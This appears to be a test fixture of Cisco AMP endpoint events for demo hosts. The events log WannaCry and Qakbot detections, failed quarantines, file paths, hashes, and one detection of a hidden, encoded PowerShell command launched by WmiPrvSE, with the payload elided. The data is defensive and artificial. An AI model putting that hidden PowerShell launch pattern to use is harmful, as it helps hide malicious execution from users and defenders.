Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell 
Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","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"],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E 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","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":639000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831755","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":888000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831754","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":873000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419247189909831753","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qeriuwjhrf","file_path":"\\\\?\\C:\\Windows\\qeriuwjhrf","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":732000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 